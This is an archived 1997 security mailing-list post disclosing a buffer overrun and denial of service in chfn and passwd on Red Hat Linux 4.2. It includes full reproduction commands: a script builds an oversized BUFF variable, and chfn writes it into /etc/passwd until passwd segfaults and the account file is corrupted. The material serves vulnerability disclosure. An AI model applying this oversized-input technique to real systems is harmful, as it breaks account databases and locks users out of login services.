Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)

From: Alex Mottram (alex@NET-CONNECT.NET)
Date: Fri Dec 19 1997 - 05:37:49 PST

Next message: Tim Newsham: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"

Previous message: Aleph One: "Administratrivia"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I don't have the time to look into this much further, but it definitely
looks scarey.  I've tried it on 3 machines, and they all produce the
same results.  For what it's worth, all 3 machines were installed from
the Redhat PowerTools 4.2 CD and have applied all relevant patches
from ftp.redhat.com/pub/updates/4.2/i386/.

Configuration Information
---------------------------------------------
[alex@machine alex]$ cat /etc/redhat-release
release 4.2 (Biltmore)

rpm -qf /usr/bin/chfn
util-linux-2.5-38

rpm -qf /usr/bin/passwd
passwd-0.50-7

rpm -q pam
pam-0.57-4

[alex@machine alex]$ cat /etc/pam.conf
#
#  THIS FILE IS NOW OBSOLETE
#
#  The contents of this file should be replaced by files in the
#  /etc/pam.d/ directory.
#
#

[alex@machine alex]$ ls /etc/pam.d/
chfn    ftp     login   passwd  rlogin  samba   xdm
chsh    imap    other   rexec   rsh     su

[alex@machine alex]$ cat /etc/pam.d/chfn
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so shadow nullok
use_authtok
session    required     /lib/security/pam_pwdb.so

[alex@machine alex]$ cat /etc/pam.d/passwd
#%PAM-1.0
auth       required     /lib/security/pam_pwdb.so shadow nullok
account    required     /lib/security/pam_pwdb.so
password   required     /lib/security/pam_cracklib.so
password   required     /lib/security/pam_pwdb.so use_authtok nullok

[alex@machine /tmp]$ tail /etc/passwd
alex:x:500:500:alex,,,,:/home/alex:/bin/bash
zane:x:501:501:zane,,,,:/home/zane:/bin/bash
someone:x:502:502::/home/someone:/bin/bash

[alex@machine /tmp]$ cat pass
#this test has 11719 bytes of the sequence "0123456789", Xs work just as
well.
export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
/bin/bash

[alex@machine /tmp]$ ./pass
[alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
Changing finger information for alex.
Password:
Finger information changed.
[alex@machine /tmp]$ wc /etc/passwd
     26      29    2068 /etc/passwd

** At this point, the passwd entry for 'alex' is >48k long **

[alex@machine alex]$ passwd
Changing password for alex
(current) UNIX password:
New UNIX password:
Segmentation fault

** LOGIN AS SECOND USER **
[zane@machine zane]$ passwd
Changing password for zane
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

** 'passwd' just snipped our one big line into nice 8k chunks
** and created some junk passwd file entries.

[zane@machine zane]$ wc /etc/passwd
     31      34   47829 /etc/passwd

[zane@machine zane]$ su someuser
su: user someuser does not exist
[zane@machine zane]$ su alex
su: user alex does not exist
[zane@machine zane]$ su zane
su: user zane does not exist

Other services I checked were equally screwed.  (ftp, pop-3, etc...)

Next message: Tim Newsham: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
Previous message: Aleph One: "Administratrivia"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:00 PDT